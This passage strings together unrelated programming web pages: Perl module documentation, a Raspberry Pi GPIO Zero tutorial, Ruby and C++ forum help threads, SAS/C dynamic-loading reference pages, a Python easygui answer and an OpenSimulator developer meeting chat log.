baz }; It has to be written as either my @x = apply { s/foo/bar/ } 'foo', 'bar', 'baz'; or my @x = apply { s/foo/bar/ } my @dummy = qw/foo bar baz/; Perl 5.5.x and Perl 5.8.x don't suffer from this limitation. If you have a functionality that you could imagine being in this module, please drop me a line. This module's policy will be less strict than List::Util's when it comes to additions as it isn't a core module. When you report bugs, it would be nice if you could additionally give me the output of your program with the environment variable LIST_MOREUTILS_PP set to a true value.
That way I know where to look for the problem (in XS, pure-Perl or possibly both). Bugs should always be submitted via the CPAN bug tracker. Credits go to a number of people: Steve Purkis for giving me namespace advice, and James Keenan and Terrence Branno for their effort of keeping the CPAN tidier by making List::Utils obsolete. Brian McCauley suggested the inclusion of apply() and provided the pure-Perl implementation for it. Eric J. Roode asked me to add all functions from his module List::MoreUtil into this one. With minor modifications, the pure-Perl implementations of those are by him. The bunch of people who almost immediately pointed out the many problems with the glitchy 0.07 release (Slaven Rezic, Ron Savage, CPAN testers). A particularly nasty memory leak was spotted by Thomas A. Lowery. Lars Thegler made me aware of problems with older Perl versions. Anno Siegel de-orphaned each_arrayref(). David Filmer made me aware of a problem in each_arrayref that could ultimately lead to a segfault. Ricardo Signes suggested the inclusion of part() and provided the Perl implementation. Robin Huston kindly fixed a bug in perl's MULTICALL API to make the XS implementation of part() work. A pile of requests from other people is still pending further processing in my mailbox. This includes: Allow List::MoreUtils to pass through the regular List::Util functions so that end users only need to use the one module. Use a code reference to extract a key based on which the uniqueness is determined. Suggested by Aaron Crane. These were all suggested by Dan Muey. Always return a flat list when either a simple scalar value or an array reference was passed. Suggested by Mark Summersault.
http://search.cpan.org/~adamk/List-MoreUtils/lib/List/MoreUtils.pm
One of the most exciting starter activities to do with a Raspberry Pi is something you can't do on your regular PC or laptop—make something happen in the real world, such as flash an LED or control a motor. If you've done anything like this before, you probably did it with Python using the RPi.GPIO library, which has been used in countless projects. There's now an even simpler way to interact with physical components: a new friendly Python API called GPIO Zero. Photo by Giles Booth. Used with permission. I recently wrote about Raspberry Pi Zero, the $5 computer and latest addition to the world of affordable hardware. Although the names are similar, the GPIO Zero and Raspberry Pi Zero projects are unrelated and are not coupled. The GPIO Zero library is made to work on all Raspberry Pi models, and is compatible with both Python 2 and Python 3. The RPi.GPIO library is bare bones and provides all the essential functionality to do simple things with the Pi's GPIO pins—set up pins as inputs or outputs, read inputs, set outputs high or low, and so on. GPIO Zero is built on top of this and provides a collection of simple interfaces to everyday components, so rather than setting pin 2 high to turn on an LED, you have an LED object and you turn it on. GPIO port label – from rasp.io/portsplus Getting started With GPIO Zero, you import the name of the interfaces you're using, for example: from gpiozero import LED You must also correctly wire up any components you're using and connect them to the GPIO pins. Note that some pins are allocated to 3V3, 5V, and GND; a few are special purpose and the rest are general purpose.
Refer to pinout.xyz for more information, or use a port label: Blink an LED with the following code: from gpiozero import LED from time import sleep led = LED(17) while True: led.on() sleep(1) led.off() sleep(1) Alternatively, use the LED's blink() method, but make sure to keep the program alive with signal.pause() like so: from gpiozero import LED from signal import pause led = LED(17) led.blink() pause() Output devices As well as a basic LED interface, with the methods on(), off(), toggle(), and blink(), GPIO Zero also provides classes for Buzzer and Motor, which work in a similar way: from gpiozero import Buzzer, Motor from time import sleep buzzer = Buzzer(14) motor = Motor(forward=17, backward=18) while True: motor.forward() sleep(10) motor.backward() buzzer.beep() sleep(10) buzzer.off() There also are interfaces for PWMLED (control the brightness rather than just on/off), and for RGB LED, which is an LED comprising red, green, and blue parts using the brightness of each to provide full color control. There's even an interface for TrafficLights. Provide the pin numbers the red, amber, and green lights are connected to, then control with: lights = TrafficLights(2, 3, 4) lights.on() lights.off() lights.blink() lights.green.on() lights.red.on() and so on. Input devices The simplest input device is a push button, and the interface provided makes it easy to control programs with button presses: from gpiozero import Button button = Button(14) while True: if button.is_pressed: print("Pressed") Another way to use button pressed to control programs is to use wait_for_press: button.wait_for_press() print("pressed") This halts the program until the button is pressed, then continues. Alternatively, rather than polling the button state, you can connect actions to button presses: button.when_pressed = led.on button.when_released = led.off Here, the method led.on is passed in as the action to be run when the button is pressed, and led.off as the button is released. 
This means when the button is pressed, the LED comes on, and when it's released the LED goes off. In addition to using other GPIO Zero object methods, you can use custom functions: def hello(): print("Hello") def bye(): print("Bye") button.when_pressed = hello button.when_released = bye Now every time the button is pressed, the hello function is called and prints "Hello". When the button is released it prints "Bye". Using custom functions like this is a good way to run a set of GPIO instructions, such as a traffic lights sequence: def sequence(): lights.green.off() lights.amber.on() sleep(1) lights.amber.off() lights.red.on() sleep(20) lights.amber.on() sleep(1) lights.green.on() lights.amber.off() lights.red.off() lights.green.on() button.when_pressed = sequence Now when the button is pressed, the traffic lights will go from green to red, then wait 20 seconds before turning back to green, in the usual way.
Alternatively, a clever feature of GPIO Zero allows you to directly connect two devices together without continuously updating inside a loop. Every output device has a source property, which can read an infinite generator of values. All devices (input and output) have a values property, which is an infinite generator, yielding the device's current value at all times: from gpiozero import PWMLED, MCP3008 led = PWMLED(4) pot = MCP3008() led.source = pot.values This works exactly the same as the previous example, just without the need for a while loop. You can connect multiple analogue inputs to the same ADC (the MCP3008 chip provides 8 channels). This example uses three potentiometers allowing control of each color channel in an RGB LED using the same method: This allows you to use the three potentiometers as a color mixer for the RGB LED. Bundle interfaces Like the TrafficLights interface, there are others for bundles of components, particularly for use in commonly used simple add-on boards. Generic LED board or collection of LEDs, controlled together or individually: from gpiozero import LEDBoard lights = LEDBoard(2, 3, 4, 5, 6) lights.on() lights.off() lights.leds[1].on() lights.leds[3].toggle() lights.leds[5].on() lights.leds[2].blink() lights.leds[4].blink() The Ryanteck TrafficHAT: from gpiozero import TrafficHat hat = TrafficHat() hat.on() hat.off() hat.lights.blink() hat.buzzer.on() hat.button.when_pressed = hat.lights.on hat.button.when_released = hat.lights.off Note that the TrafficHat interface did not require a set of pin numbers, because they are already defined within the class. Connect up two motors and make a chassis and you have yourself a Raspberry Pi robot: from gpiozero import Robot robot = Robot(left=(4, 14), right=(17, 18)) robot.forward() robot.backward() robot.reverse() robot.left() robot.forward() robot.stop() Zero all the things Now that there's a suite of Zero-named projects, why not use them in conjunction? 
How about a Pi Zero-powered robot programmed with GPIO Zero and PyGame Zero? GPIO Zero and PyGame Zero do work very well together—perfect for creating on-screen interfaces for GPIO components. Photo by ItsAll_Geek2Me. Used with permission. Try it now! GPIO Zero has been included in the Raspbian Jessie image since December, so you can grab a copy from raspberrypi.org/downloads. If you have an older image, install it with: sudo apt-get update sudo apt-get install python3-gpiozero python-gpiozero Open up IDLE and prototype in the REPL, or create a file to save your scripts. You can also use the regular Python shell, or install IPython and use that. More Read more about GPIO Zero: - Full documentation on readthedocs - GPIO Zero source on GitHub - GPIO Zero in The MagPi #39 - GPIO Zero: Developing a new friendly Python API for Physical Computing on bennuttall.com - Getting Started with GPIO Zero learning resource - GPIO Zero introduction on raspi.tv - RasP.iO Pro HAT Kickstarter—perfect for GPIO Zero - Keeping Physical computing simple—by Giles Booth - GPIO Zero: By George, I think I've got it—by Mike Horne
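The source/values coupling described in the analogue section above can be sketched in plain Python, with no hardware and no gpiozero dependency. FakePot and FakeLED are invented stand-ins for this illustration, not gpiozero classes.

```python
# Plain-Python sketch of gpiozero's source/values pattern: an input
# device exposes a generator of readings, and an output device drains it.

class FakePot:
    """Stands in for an analogue input; yields a fixed series of readings."""
    def __init__(self, readings):
        self._readings = readings

    @property
    def values(self):
        # An input device's `values` is a generator of its current value.
        for r in self._readings:
            yield r

class FakeLED:
    """Stands in for a PWM output; consumes a source of values."""
    def __init__(self):
        self.history = []

    def follow(self, source):
        # gpiozero assigns `led.source = pot.values`; here we just drain
        # the generator and record each value we would have written.
        for value in source:
            self.history.append(value)

pot = FakePot([0.0, 0.5, 1.0])
led = FakeLED()
led.follow(pot.values)
print(led.history)  # → [0.0, 0.5, 1.0], the LED tracks the pot readings
```

The point of the pattern is that the wiring between devices is declared once, rather than copied into a polling loop at every call site.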
https://opensource.com/education/16/2/programming-gpio-zero-raspberry-pi
Re: simple gsub question \' \` what? - From: Rob Biedenharn <Rob@xxxxxxxxxxxxxxxxxxxxxx> - Date: Sat, 31 Mar 2007 07:31:12 +0900 On Mar 30, 2007, at 5:39 PM, Timothy Hunter wrote: Dustin Anderson wrote: Sorry for the simple question, I just can't figure this out after a ... I'd use two calls to split: ... irb(main):001:0> string = 'column-1:block-0,block-2,block-1,block-3' => "column-1:block-0,block-2,block-1,block-3" irb(main):002:0> string1, s = string.split(':') => ["column-1", "block-0,block-2,block-1,block-3"] irb(main):003:0> string1 => "column-1" irb(main):004:0> string2 = s.split(',') => ["block-0", "block-2", "block-1", "block-3"] irb(main):005:0> You could probably turn that into a one-liner but that's just golfing. Here's a bit of "live" code that does the same thing (plus .to_f on the elements before turning them into a Vector, but you can knock that part out yourself) def add line id, vals = line.split(/:\s*/, 2) @labels << id @data << Vector[*(vals.split(',').map {|v| v.to_f})] end Note that the second arg (2) to split is important if a ':' can occur anywhere in your block-N parts. Of course, you just need vals.split(',') -Rob Rob Biedenharn Rob@xxxxxxxxxxxxxxxxxxxxxx - References: - simple gsub question \' \` what? - From: Dustin Anderson - Re: simple gsub question \' \` what? - From: Timothy Hunter
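The two-stage split discussed in the thread translates directly to Python, shown here only for comparison with the Ruby above. Note that Ruby's split(pattern, 2), which yields at most two fields, corresponds to maxsplit=1 in Python.

```python
# Python sketch of the same two-stage split: first on ':', then on ','.
line = 'column-1:block-0,block-2,block-1,block-3'

label, vals = line.split(':', 1)   # split only on the first ':'
blocks = vals.split(',')           # then split the remainder on ','

print(label)   # → column-1
print(blocks)  # → ['block-0', 'block-2', 'block-1', 'block-3']
```

As in the Ruby version, limiting the first split matters if a ':' could ever appear inside the block-N parts.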
http://newsgroups.derkeiler.com/Archive/Comp/comp.lang.ruby/2007-03/msg04175.html
Tuesday of this past week I decided I would give myself a long overdue refresher course in C++. So I started with the tutorials, and when I got to Linked Lists I got stuck on a practice program I was writing. The program compiles and runs, but when I type the word done it doesn't continue on to printing out the list; it asks for another inventory item. Code: #include <iostream> using namespace std; struct node { char *Inv; node *pNext; node *pPrev; }; node *pHead; node *pTail; void AddNode( node *pNode); int main() { char *temp; node *list; while (temp != "done") { cout<<"Enter inventory item: "; cin>>temp; cin.ignore(); list = new node; list->Inv=temp; AddNode(list); } cout<<"\n\n\n...Ready to print inventory\n\n"; for (list = pHead;list != NULL;list = list->pNext) { cout<<list->Inv; } } void AddNode( node *pNode) { if ( pHead == NULL ) { pHead = pNode; pNode->pPrev = NULL; } else { pTail->pNext = pNode; pNode->pPrev = pTail; } pTail = pNode; pNode->pNext = NULL; } Any ideas?
http://cboard.cprogramming.com/cplusplus-programming/70318-linked-list-problems.html
Hello, I am just learning c++ and I'm trying to create heap-based objects. In the destructor of the class, I must delete the object from the heap. My question is: How can I delete the heap objects that I put into a vector? For example: this is a Sample class. This class has a vector called myVector and Testing is another object. I get this error while compiling:I get this error while compiling:Code://File: Sample.cc #include <string> #include <vector> #include "Testing.h" using namespace std; Sample::Sample() {} Sample::~Sample() { for (int i=0; i<myVector.size(); i++) { delete myVector[i]; } } void Sample::sampleMethod(string myValue) { Testing *t; //create an new Testing object, t, on the heap t = new Testing(); t->setValue(myValue); //set the value of t myVector.push_back(*t); //put t into a vector } Sample.cc: In method `Sample::~Sample()': Sample.cc:11: type `class Testing' argument given to `delete', expected pointer Does anyone know what is wrong? How can I delete the objects in the vector? Thanks alot!
http://cboard.cprogramming.com/cplusplus-programming/18552-destructor-help.html
As with any C program, program execution always begins with a function named main. The load module containing the main function must remain in memory at all times. Each subordinate (dynamically loaded) load module must contain a function named _dynamn (which is a contraction for dynamic main). From the perspective of the compiler, the _dynamn function serves the same role in the subordinate load module as main serves in the module containing the main program. A main load module is one which contains a main function, or which can cause the C environment to be created in conjunction with using the indep compiler option. A dynamically loadable module is one which contains a _dynamn function. It is not possible to create a load module which is of both types. Any attempt to do so will fail at link time or at execution time. Two consequences of this requirement are: You cannot link a main function and a _dynamn function into the same load module. In particular, this means that you cannot have a source file which includes both these functions. You cannot link code compiled with the indep option into a load module which includes a _dynamn function. Load modules other than the main program module can be loaded by use of the loadm and unloadm functions. The second argument to loadm is a pointer to a function pointer in which the address of the loaded _dynamn routine will be stored. In addition to loadm and unloadm, the library provides functions to load and unload modules containing only data (loadd and unloadd) and a function that converts a load module entry point address to a function pointer (buildm). Two other functions, addsrch and delsrch, are provided, primarily for CMS, to define the load module search order. The search order consists of the possible locations of dynamically loaded modules and the order in which they are processed. Before any of these routines can be used, the source program must include the header file <dynam.h> using the #include statement. Transfers of control between load modules are possible only by using function pointers.
However, through the use of appropriate pointers, a routine in one load module can call a routine in any other load module. The inability of one load module to call another directly is a special case of a more general restriction; namely, load modules cannot share external variables. More precisely, two external variables (or functions) of the same name in different load modules are independent of each other. (There are a few special cases such as the variable errno, which contains the number of the most recent run-time problem.) See Appendix 4, "Sharing extern Variables among Load Modules," in the SAS/C Compiler and Library User's Guide, Fourth Edition for additional information. An external variable or function can be accessed directly only by functions that have been linked in that module. All functions in other modules can gain access to them only by use of pointers. The functions for dynamic loading, especially addsrch and delsrch, are highly operating-system-dependent. The definition of each dynamic-loading function highlights aspects of the function that depend in some way on the operating system. addsrch and delsrch, for example, are of interest to users working under MVS only when a program needs to be portable to CMS. For CMS, these functions are quite useful but are not needed typically in an MVS environment. #include <dynam.h> SEARCH_P addsrch(int type, const char *loc, const char *prefix); addsrch adds a "location" to the list of "locations" from which modules can be loaded. This list controls the search order for load modules loaded via a call to loadm. The search order can be described additionally by the third argument, prefix. The first argument type must be a module type defined in <dynam.h>. The module type defines what type of module is loaded and varies from operating system to operating system. The character string specified by the second argument loc names the location. The format of this string depends on the module type.
The third argument prefix is a character string of no more than eight characters. addsrch is of interest primarily to CMS users and to MVS users writing programs portable to CMS. The remainder of this discussion, therefore, focuses on the use of addsrch under CMS. The module type controls which locations are searched when loadm is called. The module type also controls the format of the second argument loc, which names the location to be searched by loadm. All location strings may have leading and trailing blanks, and the characters are uppercased. addsrch does not verify the existence of the location. The third argument is a character string of no more than eight characters. It may be "". If it is not null, then it specifies that the location indicated is searched only if the load module name (as specified by the first argument to loadm) begins with the same character or characters specified in the third argument. At C program initialization, a default location, defined by the following call, is in effect: sp = addsrch(CMS_LDLB, "DYNAMC *", ""); addsrch returns a value that can be passed to delsrch to delete the input source. Under CMS, this specifically means a value of the defined type SEARCH_P, which can be passed to delsrch to remove the location from the search order. If an error occurs, a value of 0 is returned. The module types accepted by addsrch are defined only under CMS. The use of addsrch under MVS with a CMS module type has no effect. addsrch does not verify that a location exists (DYNAMC LOADLIB, for example) or that load modules may be loaded from that location. The loadm function searches in the location only if the load module cannot be loaded from a location higher in the search order. addsrch fails only if its parameters are ill-formed. #include <dynam.h> SEARCH_P mylib; . . . /* Search for modules in a CMS LOADLIB.
      */
   mylib = addsrch(CMS_LDLB, "PRIVATE *", "");

buildm

SYNOPSIS
   #include <dynam.h>

   void buildm(const char *name, __remote /* type */ (**fpp)(), const char *ep);

DESCRIPTION
buildm converts the entry point address in ep to a __remote function pointer. The created function pointer can then be used to transfer control to a function or module located at this address. buildm is normally used to generate a function pointer for a C load module that has been loaded without the assistance of the SAS/C Library (for instance, by issuing the MVS LOAD SVC), but it can also be used with a non-C load module or with code generated by the program. buildm also assigns a load module name to the entry point address, and use of this name in subsequent calls to loadm or unloadm is recognized as referring to the address in ep. Note that a load module processed with buildm should always include a _dynamn function.

buildm stores the function pointer in the area addressed by fpp. Note that fpp may reference a function returning any valid type of data. If the function pointer cannot be created, a NULL value is stored.

name points to a name to be assigned to the built load module. If name is "", then a unique name is assigned by buildm. If the name is prefixed with an asterisk, then buildm does not check whether the name is the name of a previously loaded module (see "ERRORS" below).

RETURN VALUE
buildm stores the function pointer in the area addressed by fpp. If an error occurs, buildm stores NULL in this area.

ERRORS
If name does not start with an asterisk and is the same as the name of a previously built or dynamically loaded module, the request is rejected unless the value of ep is the same as the entry point of the existing load module. If the entry points are the same, a pointer to the previously loaded or built module is stored in the area addressed by fpp.

The name argument must point to a null-terminated string no more than eight characters long, not counting a leading asterisk. Leading and trailing blanks are not allowed.
The fpp argument must be a pointer to an object declared as "pointer to function returning (some C data type)".

EXAMPLE
The example assumes that SIMPLE is a C _dynamn function returning void:

   #include <svc.h>
   #include <code.h>
   #include <stdio.h>

   #define LOAD(n,ep) (_ldregs(R0+R1,n,0),_ossvc(8), _stregs(R0,ep))

   main()
   {
      void (*fp)();
      char *ep;

         /* The name "SIMPLE" must be uppercased, left-adjusted, */
         /* and padded to eight characters with blanks when      */
         /* used by SVC 8.                                       */
      LOAD("SIMPLE  ",&ep);
         /* The name passed to buildm does not have to match     */
         /* the name of the loaded module, but it helps.         */
      buildm("simple",&fp,ep);
      if (fp)        /* If no errors, call SIMPLE */
         (*fp)();
      else
         puts("simple didn't load.");
   }

delsrch

SYNOPSIS
   #include <dynam.h>

   void delsrch(SEARCH_P sp);

DESCRIPTION
delsrch removes the "location" pointed to by the argument sp from the load module search order list. sp is a value returned previously by addsrch.

PORTABILITY
delsrch is not portable. delsrch is used primarily in a CMS environment as a counterpart to addsrch, or by MVS programs that must be portable to CMS.

EXAMPLE
This example illustrates delsrch under CMS:

   #include <dynam.h>

   SEARCH_P source;
   char *new_source;
   . . .
      /* Delete old search location. */
   if (source)
      delsrch(source);
      /* Add new search location.   */
   source = addsrch(CMS_LDLB, new_source, "");

loadd

SYNOPSIS
   #include <dynam.h>

   void loadd(const char *name, char **dp, MODULE *mp);

DESCRIPTION
loadd is similar to loadm (load executable module) except that it is intended for data modules. loadd loads the module named by the argument name and stores the address of the load module's entry point in the location pointed to by the second argument dp. If the module has already been loaded, the pointer returned in the second argument points to the previously loaded copy. If the module name in the first argument string is prefixed with an asterisk, a private copy of the module is loaded. The third argument addresses a location where a value is stored that can be used later to remove the module from memory via unloadd.
loadd should be used only to load modules that contain data (for example, translation tables) rather than executable code.

RETURN VALUE
loadd indirectly returns a value that is stored in the location addressed by the third argument mp. This value can be used later to remove the module from memory via unloadd. If the module to be loaded cannot be found, 0 is returned.

CAUTION
A module loaded by loadd must contain at least 16 bytes of data following the entry point, or library validation of the module may fail.

PORTABILITY
loadd is not portable. As with other dynamic-loading functions, be aware of system-specific requirements for the location of modules to be loaded.

IMPLEMENTATION
The behavior of loadd necessarily varies from operating system to operating system. Under MVS, modules to be loaded must reside in STEPLIB.

EXAMPLE
This example illustrates loadd:

   #include <dynam.h>
   #include <lcstring.h>

   char *table;
   char *str;
   MODULE tabmod;

      /* Load a translate table named LC3270AE. */
   loadd("LC3270AE",&table,&tabmod);
   str = strxlt(str, table);
   unloadd(tabmod);   /* Unload module after use. */

loadm

SYNOPSIS
   #include <dynam.h>

   void loadm(const char *name, __remote /* type */ (**fpp)());

DESCRIPTION
loadm loads an executable module named by the argument string name and stores a C function pointer in the location pointed to by the argument fpp. If the module has already been loaded, the pointer stored in fpp points to the previously loaded copy. If the module name in the first argument string is prefixed with an asterisk, a private copy of the module is loaded. Note that fpp may reference a function returning any valid type of data.

RETURN VALUE
loadm provides an indirect return value in the form of a function pointer that addresses the entry point of the loaded module. If the module is in C, calling the returned function always transfers control to the _dynamn function of the module. If the module to be loaded cannot be found, a NULL is stored in the location addressed by fpp.

PORTABILITY
loadm is not portable. Be aware of system dependencies involving where load modules may be located and how module names are specified for your operating system.
IMPLEMENTATION
The behavior of loadm necessarily varies from operating system to operating system. Under MVS, modules to be loaded must reside in STEPLIB, a task library, or another location searched by the MVS LOAD service.

Under CMS, addsrch does not verify the existence of a location (for example, DYNAMC LOADLIB). Because in some circumstances the logic of a program may not require that a location be searched, no verification is done until loadm cannot find a load module in any location defined earlier in the search order. addsrch fails only if its parameters are ill-formed. If loadm determines that a location is inaccessible (for example, the LOADLIB does not exist), the location is marked unusable, and no attempt is made to search it again.

EXAMPLE
loadm is illustrated by three examples. The first demonstrates the use of the function in a very simple situation without operating-system dependencies, while the second and third examples are designed to run under MVS and CMS, respectively.

The second example creates a dynamic load module that includes a table of pointers to functions that may be called dynamically from the calling load module. This example runs under MVS and uses the sname compiler option to override the default assignment of _dynamn as the section name. It may be compiled as re-entrant using the rent compiler option. (Note that JCL changes are required for norent compilation.)

   /* neptune */
   #include <stdio.h>

   void neptune(char *p)
   {
      puts(p);
      return;
   }

STEP 1. Make the function neptune into a load module. (See the SAS/C Compiler and Library User's Guide, Fourth Edition, for more information about the sname compiler option.) Under CMS, a command such as the following is required:

   LKED NEPTUNE (LIBE DYNAMC NAME NEPTUNE

If you use some other filename for the LOADLIB, specify it in a call to addsrch before loading the module.

unloadd

SYNOPSIS
   #include <dynam.h>

   void unloadd(MODULE mp);

DESCRIPTION
unloadd unloads the data module identified by the argument mp. If the module is no longer in use, unloadd deletes it from memory.

DIAGNOSTICS
If the argument to unloadd is invalid, a user 1211 ABEND is issued. Various other ABENDs, such as 1215 or 1216, may occur during unloadd if library areas used by dynamic loading have been overlaid.

EXAMPLE
For an example of the use of unloadd, see loadd.
unloadm

SYNOPSIS
   #include <dynam.h>

   void unloadm(__remote /* type */ (*fp)());

DESCRIPTION
unloadm unloads the executable module containing the function addressed by the argument fp. If the module is no longer in use, unloadm deletes it from memory. Note that fp may reference a function returning any valid type of data.

unloadm may be used to unload a module that has been built by buildm, but in that case unloadm will not delete the module from memory.

DIAGNOSTICS
If the argument to unloadm is invalid, a user 1211 ABEND is issued. Various other ABENDs, such as 1215 or 1216, may occur during unloadm if library areas used by dynamic loading have been overlaid.

EXAMPLE
This example illustrates unloadm:

   #include <dynam.h>

   int (*fp)();

      /* Load a load module named "IEFBR14", */
      /* call it, and unload it.             */
   loadm("iefbr14",&fp);
   (*fp)();
   unloadm(fp);

Copyright (c) 1998 SAS Institute Inc., Cary, NC, USA. All rights reserved.
This is my first question on Stack Overflow, so forgive me if I do something wrong. I've been using Python for a few months. I'm trying to make a simple GUI, and I came across EasyGUI. When I try to import the module, I get an error:

   Traceback (most recent call last):
     File "C:/Users/matthewr/PycharmProjects/testing start/Tsting.py", line 1, in <module>
       import easygui
     File "C:\Users\matthewr\AppData\Local\Programs\Python\Python35-32\lib\site-packages\easygui\__init__.py", line 50, in <module>
       from .boxes.choice_box import choicebox
     File "C:\Users\matthewr\AppData\Local\Programs\Python\Python35-32\lib\site-packages\easygui\boxes\choice_box.py", line 76
       except Exception, e:
                       ^
   SyntaxError: invalid syntax

My code is simply:

   import easygui

Answer: Try easygui 0.96.0. I've been using easygui for some time, but I had exactly the same problem today on a new machine with a fresh install of Python 3.5.2 and easygui 0.98.0. However, easygui 0.96.0 works for me:

   pip uninstall easygui
   pip install easygui==0.96.0
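The root cause is visible in the traceback: that easygui release contains except Exception, e:, which is Python 2-only syntax and a SyntaxError under any Python 3 interpreter. A minimal illustration of the difference (the ValueError raised here is just a stand-in, not anything easygui itself raises):

```python
# Python 2 wrote exception handlers as:
#     except Exception, e:      # SyntaxError in Python 3
# Python 3 requires the "as" form instead:
try:
    raise ValueError("demo error")  # stand-in exception
except Exception as e:
    caught = type(e).__name__

print(caught)
```

So pinning an older easygui works because 0.96.0 happens to avoid the Python 2-only spelling; any release written for Python 3 would use the "as" form throughout.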
Chat log from the meeting on 2007-10-23
From OpenSimulator
(The first part of the meeting log was lost.)

[10:25] cfk say, ODE INTERNAL ERROR 1: assertion "bNormalizationResult" failed in _dNormalize4() [../../include/ode/odemath.h]
[10:25] nebadon say, yea
[10:25] nebadon say, somone was flying around
[10:25] nebadon say, smashing into every prim on the server
[10:25] Neas Bade: ok, back now
[10:25] You: back
[10:25] Nebadon Izumi: nice quick recovery
[10:26] Charles Krinkeb: Sorry about that, had a little ODE INTERNAL ERROR 1: assertion "bNormalizationResult" failed in _dNormalize4() [../../include/ode/odemath.h]
[10:26] You: back
[10:26] Sakai openlifegrid: ah everyone died...
[10:26] You: where were we?
[10:26] Nebadon Izumi: ya server crashed
[10:26] You: have we lost the chat log?
[10:26] Nebadon Izumi: yes
[10:26] Charles Krinkeb: 0.5 features, I think.
[10:26] Nebadon Izumi: probably Tleides
[10:27] Nebadon Izumi: unless someone has chat log enabled
[10:27] Neas Bade: we were discussing release. I think that at this point we should start building the roadmap
[10:27] Sakai openlifegrid: last i heard was.. hsitory should be in the client
[10:27] Nebadon Izumi: only if you turn it on Sakai
[10:27] Charles Krinkeb: Who should be point on the roadmap, Neas?
[10:27] Sakai openlifegrid: yes
[10:27] Nebadon Izumi: and i dont have it on
[10:27] You: maybe we can pull it of IRC?
[10:27] Nebadon Izumi: yea
[10:27] Wright Juran: that will teach me to write long messages, wrote a long reply and the server was gone when I pressed send
[10:27] Nebadon Izumi: irc has it
[10:27] Neas Bade: there is some stuff I put in there after the last meeting, but there is clearly a lot of other things we need
[10:28] You: ok, the reason why I am for a small feature set in 0.5 is a goal of releasing frequently
[10:28] Charles Krinkeb: I'll take care of the chat log after the meeting from the irc backup.
[10:28] danx danx0r: did everyone crash or just me?
[10:28] Nahona Nakamori: excuse me, completly out of the subject but can i give you two entry to remove from sim db ?
[10:28] You: but in a way you could say we release 4-5-6 times a day
[10:28] Nahona Nakamori: excuse me, completly out of the subject but can i give you two entry to remove from sim db ?
[10:29] You: the region server crashed
[10:29] Sakai openlifegrid: hehe yes and i build them everyday!
[10:29] Wright Juran: yeah but with 0.5 I think we always knew and said it would be a big release with a lot of work done, so we can get the foundations of grid mode done
[10:29] Neas Bade: I think the problem with that is that there is a bunch of interconnected issues around grid that don't lend themselves to small incremental right now
[10:29] Wright Juran: and I'm 100% for that
[10:29] Charles Krinkeb: I think feature requests are appropriate as Mantis entries. This is more of a strategic meeting.
[10:30] Wright Juran: ++ to Neas Bades comments,
[10:30] Neas Bade: he, btw IM is "funny" right now
[10:30] Charles Krinkeb: Mw. If gridmode needs to break for weeks or months, Please do what you need to do and we will support you.
[10:30] Sakai openlifegrid: yes IM is crossing the names
[10:30] Sakai openlifegrid: in the display
[10:30] Wright Juran: Charles, err grid mode is broke :)
[10:30] Charles Krinkeb: Lets not use IM
[10:31] Nebadon Izumi: hehe yea
[10:31] Charles Krinkeb: Understood.
[10:31] You: I think most of the server backends can be done incrementally
[10:31] Wright Juran: so are we saying that Adam's IM module doesn't work?
[10:31] danx danx0r: my issue is the reports of sporadic ODE crashes
[10:31] Neas Bade: it doesn't display names correctly
[10:32] danx danx0r: I can't fix that unless I get crash reports
[10:32] Neas Bade: I'll look into it later
[10:32] You: why not build on top of jabber?
[10:32] danx danx0r: and then I'll probably have to add some debugging and get another crash to really nail it down
[10:32] Blue Mouse: yes, please jabber
[10:32] Nebadon Izumi: one problem danx is the ode exceptions dont say much
[10:32] Charles Krinkeb: Mw: If you need me to change my strategy on inviting new sims and new users onto OSGrid, just tell me what you need that to be like and I will accomodate your.
[10:32] Nebadon Izumi: its always the same error
[10:32] Charles Krinkeb: desires.
[10:32] Wright Juran: we have talked about using jabber before
[10:33] Neas Bade: well, Tleiades, I think that the way to resolve your point of view with some of the other points of view is to get lots of code in the tree to mature it faster :)
[10:33] Wright Juran: and for IM's that has been the plan, just hard finding a c# jabber server that we could modify
[10:33] Neas Bade: we did a core group vote of confidence as we got close to the release last time, which happened a month after the original date was set
[10:33] Blue Mouse: could we write a quick shim that connects to the jabber.org server?
[10:33] You: sean .. I do try, but I have a daytime job, and a family as well :)
[10:33] Neas Bade: yep, I understand :)
[10:33] danx danx0r: neb, I haven't gotten a crash from you or charles in over a week, since 0.9 ODE fix
[10:34] Blue Mouse: that was actually a question more intended to question license & distro issues
[10:34] danx danx0r: if I get a report, I will add debugging info around that part of the code
[10:34] Wright Juran: if we want releases often, then we can do 0.4.X releases and even introduce some grid improvement features into them, just think 0.5 should wait
[10:34] danx danx0r: so next crash will be more verbose
[10:34] Nebadon Izumi: i havent crashe dDan
[10:34] Nebadon Izumi: ODE crashing has virtually stopped for me
[10:34] Charles Krinkeb: WP just crashed with ODE INTERNAL ERROR 1: assertion "bNormalizationResult" failed in _dNormalize4() [../../include/ode/odemath.h] , Dan
[10:34] Sakai openlifegrid: we saw a fair bit of it last week...
[10:34] Nebadon Izumi: i know this server is running Mono 1.3.2?
[10:35] Nebadon Izumi: im wondering if mono is contributing to problems here
[10:35] Nebadon Izumi: yea thats the standard ODE crash
[10:35] Nebadon Izumi: pretty much
[10:35] Nebadon Izumi: rarely do you get much more than that
[10:35] Neas Bade: so, lets try to turn this around to things that need attention in the next week
[10:35] Charles Krinkeb: no. mono-1.2.3.1
[10:35] Nebadon Izumi: ah yea
[10:35] You: my reason for wanting a quick release, is based on "release frequently"
[10:36] Neas Bade: 1) IM is funny, I'll sign up to try to fix that by next week
[10:36] danx danx0r: thx charles
[10:36] You: but since we - in a way - release 4-5-6 times a day, in svn, I have come to agree with the longer target for 0.5
[10:36] lmmz say, I just upgraded my regions to mono 1.2.5. After some trouble upgrading, it seems to work fine.
[10:36] Neas Bade: 2) Physics, obviously needs some love
[10:36] Wright Juran: I'll sign up to try to get time to make a start on the asset module (that sends the data to the client) but still a busy time for me so can't promise it by next week
[10:37] Charles Krinkeb: Mw, Neas? I will need some guidance on when you will feel comfortable moving beyond mono-1.2.3.1. Perhaps a list of recommended versions we are dependent on would be helpful?
[10:37] Sakai openlifegrid: well if a longer target date means a more stable envorinment I think it's worth it
[10:37] Neas Bade: is there something that can be done to help debug that
[10:37] lmmz say, Adam says that mono 1.2.3 has known issues.
[10:37] You: by next week, I plan to have a transfer of assets from the asset server to the region server
[10:37] Neas Bade: I've gone to 1.2.4 on everything as that's what's in gutsy
[10:37] Nebadon Izumi: im using 1.2.5.1 on all of my servers
[10:37] Tleiades Hax is on gutsy too
[10:37] Neas Bade: Wright Juran: yeh, not so much asking for people to say "this will be done by next week"
